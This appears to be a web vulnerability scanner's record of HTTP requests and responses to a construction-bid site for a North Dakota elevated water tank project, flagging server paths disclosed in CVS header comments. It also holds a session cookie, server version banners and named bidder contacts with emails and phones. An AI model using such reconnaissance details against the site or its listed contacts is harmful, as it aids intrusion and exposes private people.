</tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 01:30:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td valign="top" width="130" height="10"><span class="prj_ftitle">project description:</span></td> <td width="210" height="10"><span class="prj_data">Separate sealed bids for construction of <B><U>OMND Regional Service Area, Center Elevated Tank, Contract 5-16</U></B> will be received by the <U>North Dakota State Water Commission (NDSWC), Bismarck, ND</U> until <B><U>1:30</U></B> P.M., Local Time on the <B><U>3rd</U></B> day of <B><U>March</U>, 2011</B> where and at which time they will be publicly opened and read aloud.<BR><BR>The scope of WORK generally consists of furnishing and installing one elevated composite, or
spheroid style steel potable water storage tank, 750,000 gallons (min.), 175’ to overflow,
complete with access road, inlet/outlet piping, foundation, site piping, appurtenances, painting,
sitework, outlet structure and other appurtenant items as required by the Project Drawings, Specifications, and Contract Documents. The Center Elevated Tank site is located in Oliver County, approximately 12 miles south of the City of Beulah, North Dakota.<BR><BR>Each BID must be accompan..
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21107
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1438657&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1438657&group=11&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat324403"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=11&provider=453856#cat324403">Sewer and Water Construction ( 1 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat1048445"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=1048445&group=11&provider=453856#cat1048445">Water Resources Infrastructure ( 3 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16<span><span class="prj_num">(#1438657)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Oliver - Beulah, ND</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 01:30:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td valign="top" width="130" height="10"><span class="prj_ftitle">project description:</span></td> <td width="210" height="10"><span class="prj_data">Separate sealed bids for construction of <B><U>OMND Regional Service Area, Center Elevated Tank, Contract 5-16</U></B> will be received by the <U>North Dakota State Water Commission (NDSWC), Bismarck, ND</U> until <B><U>1:30</U></B> P.M., Local Time on the <B><U>3rd</U></B> day of <B><U>March</U>, 2011</B> where and at which time they will be publicly opened and read aloud.<BR><BR>The scope of WORK generally consists of furnishing and installing one elevated composite, or
spheroid style steel potable water storage tank, 750,000 gallons (min.), 175’ to overflow,
complete with access road, inlet/outlet piping, foundation, site piping, appurtenances, painting,
sitework, outlet structure and other appurtenant items as required by the Project Drawings, Specifications, and Contract Documents. The Center Elevated Tank site is located in Oliver County, approximately 12 miles south of the City of Beulah, North Dakota.<BR><BR>Each BID must be accompan..
|
- /qap/projects/prj_add_mod/prj_plan_list.html
/qap/projects/prj_add_mod/prj_plan_list.html |
Identified Internal Path(s)
/home/cvsroot/ipp.questcdn.com/www/projects/prj_add_mod/prj_plan_list.html,v
Request
GET /qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 18359
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_add_mod/prj_plan_list.html,v 1.4 2005/09/13 17:42:29 gkloke Exp $--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>QUESTCDN: List Planholders</title> <script language="JavaScript1.2" src="/qap/j_scripts/validation.js"></script> <link href="/qap/css_scripts/verdana.css" rel="stylesheet" media="screen"> <script name="close_window" language="JavaScript1.2"><!--<!--var UserMsg = "";var ElectronicPlanHoldersExist = "true";var modType = "ModifyElectronicPlanHolder";function VerifyInput(){ isValid = true; UserMsg = ""; if ( isEmpty(document.FormName.prj_date.value) ) { UserMsg = UserMsg + "\n Please enter an award date"; isValid = false; } else { if (document.FormName.prj_date.value.length != 8) { UserMsg = UserMsg + "\n Date must be a number in the form mmddyyyy."; isValid = false; } else { if ( !isPosInteger(document.FormName.prj_date.value) ) { UserMsg = UserMsg + "\n Date must be a number in the form mmddyyyy."; isValid = false; } else { month = document.FormName.prj_date.value.charAt(0) + document.FormName.prj_date.value.charAt(1); day = document.FormName.prj_date.value.charAt(2) + document.FormName.prj_date.value.charAt(3); year = document.FormName.prj_date.value.charAt(4) + document.FormName.prj_date.value.charAt(5) + document.FormName.prj_date.value.charAt(6) + document.FormName.prj_date.value.charAt(7); if ( month < 1 || month > 12) { UserMsg = UserMsg + "\n Month must be in the range 01..12"; isValid = false; } if ( day < 1 || day > 31) { UserMsg = UserMsg + "\n Day must be in the range 01..31"; isValid = false; } if ( year < 1998 || year > 2100) { UserMsg = UserMsg + "\n Year must be in the range 1998..2100"; isValid = false; } } } } return isValid;}function SaveData(action){ window.close();}function ModifyPlanHolder(action){ document.FormName.PlanHolderType.value = modType; document.FormName.submit();}function AddManualPlanHolder(action){ document.FormName.PlanHolderType.value = 'AddManualPlanHolder'; document.FormName.submit();}// -->// --> </script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D6431B0'] = new Array(CSCallFunction,'AddManualPlanHolder','self');CSAct[/*CMP*/ 'B3D643341'] = new Array(CSCallFunction,'ModifyPlanHolder','self');CSAct[/*CMP*/ 'B3D8F22B2'] = new Array(CSCallFunction,'SaveData','self');// --></script> </csactiondict> <csactions> <csaction name="B3D6431B0" class="Call Function" type="ONEVENT" val0="AddManualPlanHolder" val1="self" > <csaction name="B3D643341" class="Call Function" type="ONEVENT" val0="ModifyPlanHolder" val1="self" > <csaction name="B3D8F22B2" class="Call Function" type="ONEVENT" val0="SaveData" val1="self"> </csactions> </head> <body bgcolor="white"> <form name="FormName" action="/qap/action/projects/prj_add_mod/prj_plan_add.html" method="post"> <input type="hidden" name="jobPK" value="1438657" > <input type="hidden" name="PlanHolderAction" value="" > <input type="hidden" name="PlanHolderType" value="" > <input type="hidden" name="providerPK" value="" > <table cool width="708" height="503" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy bgcolor="white"> <tr height="1" cntrlrow> <td width="1" height="1"><spacer type="block" width="1" height="1"></td> <td width="705" height="1"><spacer type="block" width="705" height="1"></td> </tr> <tr height="500"> <td width="1" height="500"><spacer type="block" width="1" height="500"></td> <td width="705" height="500" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td width="25" height="10"></td> <td height="10" colspan="8"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td colspan="3"><font face="Verdana"><b>Bartlett & West - Topeka</b></font></td> </tr> <tr> <td colspan="3"><font face="Verdana"><b>Plan Holders for NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Project #1438657)</b></font></td> </tr> <tr height="10"> <td width="25" height="10"></td> <td width="95" height="10"><span class="body-bold-10">contact:</span></td> <td width="475" height="10"><span class="body">Jim Lennington, P.E.</span></td> </tr> <tr height="10"> <td></td> <td><span class="body-bold-10">phone:</span></td> <td><span class="body">701.258.1110</span></td> </tr> <tr height="10"> <td></td> <td><span class="body-bold-10">e-mail:</span></td> <td><span class="body"><a href="mailto:jim.lennington@bartwest.com">jim.lennington@bartwest.com</a></span></td> </tr> </table> </td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"><td></td> <td height="10" colspan="9"><font face="Verdana" size="3">Electronic Planholders</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td></td> <td><font size="3"><b>Company/Contact</b></font></td> <td></td> <td><font size="3"><b>Address</b></font></td> <td></td> <td><font size="3"><b>Phone/Fax</b></font></td> <td></td> <td colspan="3"><font size="3"><b>E-mail</b></font></td> </tr> <tr height="10"> <td width="10" height="10"></td> <td width="120" height="10"></td> <td width="10" height="10"></td> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="95" height="10"></td> <td width="10" height="10"></td> <td width="120" height="10"></td> <td width="10" height="10"></td> <td width="80" height="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Phoenix Fabricators and Erectors<br> Jonathan R. Dixon</font></td> <td></td> <td><font size="3">1329 US Hwy 41 N<br> P.O. Box 40<br> Sebree, KY 42455</font></td> <td></td> <td valign="top"><font size="3">2708352600<br> 2708359996</font></td> <td></td> <td valign="top" colspan="3"><font size="3">jonathan.dixon@phoenixtank.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">CB&I Inc. <br> Steven R. Brock</font></td> <td></td> <td><font size="3">1000 Remington Blvd. <br> Suite 105B<br> Bolingbrook, IL 60440</font></td> <td></td> <td valign="top"><font size="3">630-378-7664<br> 630-378-7601</font></td> <td></td> <td valign="top" colspan="3"><font size="3">sbrock@cbi.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">General Construction Services, Inc.<br> David Webb</font></td> <td></td> <td><font size="3">222 Commercial Street<br> <br> Stillwater, MN 55082</font></td> <td></td> <td valign="top"><font size="3">651.275.0114<br> 651.275.0115</font></td> <td></td> <td valign="top" colspan="3"><font size="3">dwebb@gentank.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Caldwell Tanks, Inc.<br> Carolyn E. Burke</font></td> <td></td> <td><font size="3">4000 Tower Road<br> <br> Louisville, KY 40219</font></td> <td></td> <td valign="top"><font size="3">502-964-3361<br> 502-966-8732</font></td> <td></td> <td valign="top" colspan="3"><font size="3">cburke@caldwelltanks.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Landmark Structures I, L.P.<br> Glendy Curry</font></td> <td></td> <td><font size="3">1665 Harmon Road<br> <br> Fort Worth, TX 76177</font></td> <td></td> <td valign="top"><font size="3">817/439-8888<br> 817-230-2070</font></td> <td></td> <td valign="top" colspan="3"><font size="3">estimating@teamlandmark.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Fargo Water Equipment Company<br> Fargo Water Equipment</font></td> <td></td> <td><font size="3">PO Box 128<br> 4557 15th Avenue North<br> Fargo, ND 58102</font></td> <td></td> <td valign="top"><font size="3">701-237-0222<br> 701-237-9609</font></td> <td></td> <td valign="top" colspan="3"><font size="3">emily@fgoh2o.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Ferguson Waterworks - Fargo<br> Mike O'Neill</font></td> <td></td> <td><font size="3">1917 1st Ave N<br> <br> Fargo, ND 58102</font></td> <td></td> <td valign="top"><font size="3">701-293-5511<br> 701-232-8129</font></td> <td></td> <td valign="top" colspan="3"><font size="3">moneill@nwws.biz</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Maguire Iron, Inc.<br> Troy Werdel</font></td> <td></td> <td><font size="3">P.O. Box 1446<br> <br> Sioux Falls, SD 57101</font></td> <td></td> <td valign="top"><font size="3">605-334-9749<br> 605-334-9752</font></td> <td></td> <td valign="top" colspan="3"><font size="3">werdelt@maguireiron.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Plant & Flanged Equipment Company<br> Dustin Bremness</font></td> <td></td> <td><font size="3">10101 Xylite Street NE<br> <br> Blaine, MN 55449-5227</font></td> <td></td> <td valign="top"><font size="3">763-792-3870<br> 763-792-3876</font></td> <td></td> <td valign="top" colspan="3"><font size="3">db@plantandflanged.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="20"> <td colspan="10"></td> </tr> <tr height="10"> <td width="25" height="10"></td> <td height="10" colspan="9"><font face="Verdana" size="3">Manual Planholders</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td></td> <td><font size="3"><b>Company/Contact</b></font></td> <td></td> <td><font size="3"><b>Address</b></font></td> <td></td> <td><font s..
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 18359
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_add_mod/prj_plan_list.html,v 1.4 2005/09/13 17:42:29 gkloke Exp $--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>QUESTCDN: List Planholders</title> <script language="JavaScript1.2" src="/qap/j_scripts/validation.js"></script> <link href="/qap/css_scripts/verdana.css" rel="stylesheet" media="screen"> <script name="close_window" language="JavaScript1.2"><!--<!--var UserMsg = "";var ElectronicPlanHoldersExist = "true";var modType = "ModifyElectronicPlanHolder";function VerifyInput(){ isValid = true; UserMsg = ""; if ( isEmpty(document.FormName.prj_date.value) ) { UserMsg = UserMsg + "\n Please enter an award date"; isValid = false; } else { if (document.FormName.prj_date.value.length != 8) { UserMsg = UserMsg + "\n Date must be a number in the form mmddyyyy."; isValid = false; } else { if ( !isPosInteger(document.FormName.prj_date.value) ) { UserMsg = UserMsg + "\n Date must be a number in the form mmddyyyy."; isValid = false; } else { month = document.FormName.prj_date.value.charAt(0) + document.FormName.prj_date.value.charAt(1); day = document.FormName.prj_date.value.charAt(2) + document.FormName.prj_date.value.charAt(3); year = document.FormName.prj_date.value.charAt(4) + document.FormName.prj_date.value.charAt(5) + document.FormName.prj_date.value.charAt(6) + document.FormName.prj_date.value.charAt(7); if ( month < 1 || month > 12) { UserMsg = UserMsg + "\n Month must be in the range 01..12"; isValid = false; } if ( day < 1 || day > 31) { UserMsg = UserMsg + "\n Day must be in the range 01..31"; isValid = false; } if ( year < 1998 || year > 2100) { UserMsg = UserMsg + "\n Year must be in the range 1998..2100"; isValid = false; } } } } return isValid;}function SaveData(action){ window.close();}function ModifyPlanHolder(action){ document.FormName.PlanHolderType.value = modType; document.FormName.submit();}function AddManualPlanHolder(action){ document.FormName.PlanHolderType.value = 'AddManualPlanHolder'; document.FormName.submit();}// -->// --> </script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D6431B0'] = new Array(CSCallFunction,'AddManualPlanHolder','self');CSAct[/*CMP*/ 'B3D643341'] = new Array(CSCallFunction,'ModifyPlanHolder','self');CSAct[/*CMP*/ 'B3D8F22B2'] = new Array(CSCallFunction,'SaveData','self');// --></script> </csactiondict> <csactions> <csaction name="B3D6431B0" class="Call Function" type="ONEVENT" val0="AddManualPlanHolder" val1="self" > <csaction name="B3D643341" class="Call Function" type="ONEVENT" val0="ModifyPlanHolder" val1="self" > <csaction name="B3D8F22B2" class="Call Function" type="ONEVENT" val0="SaveData" val1="self"> </csactions> </head> <body bgcolor="white"> <form name="FormName" action="/qap/action/projects/prj_add_mod/prj_plan_add.html" method="post"> <input type="hidden" name="jobPK" value="1438657" > <input type="hidden" name="PlanHolderAction" value="" > <input type="hidden" name="PlanHolderType" value="" > <input type="hidden" name="providerPK" value="" > <table cool width="708" height="503" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy bgcolor="white"> <tr height="1" cntrlrow> <td width="1" height="1"><spacer type="block" width="1" height="1"></td> <td width="705" height="1"><spacer type="block" width="705" height="1"></td> </tr> <tr height="500"> <td width="1" height="500"><spacer type="block" width="1" height="500"></td> <td width="705" height="500" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td width="25" height="10"></td> <td height="10" colspan="8"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td colspan="3"><font face="Verdana"><b>Bartlett & West - Topeka</b></font></td> </tr> <tr> <td colspan="3"><font face="Verdana"><b>Plan Holders for NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Project #1438657)</b></font></td> </tr> <tr height="10"> <td width="25" height="10"></td> <td width="95" height="10"><span class="body-bold-10">contact:</span></td> <td width="475" height="10"><span class="body">Jim Lennington, P.E.</span></td> </tr> <tr height="10"> <td></td> <td><span class="body-bold-10">phone:</span></td> <td><span class="body">701.258.1110</span></td> </tr> <tr height="10"> <td></td> <td><span class="body-bold-10">e-mail:</span></td> <td><span class="body"><a href="mailto:jim.lennington@bartwest.com">jim.lennington@bartwest.com</a></span></td> </tr> </table> </td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"><td></td> <td height="10" colspan="9"><font face="Verdana" size="3">Electronic Planholders</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td></td> <td><font size="3"><b>Company/Contact</b></font></td> <td></td> <td><font size="3"><b>Address</b></font></td> <td></td> <td><font 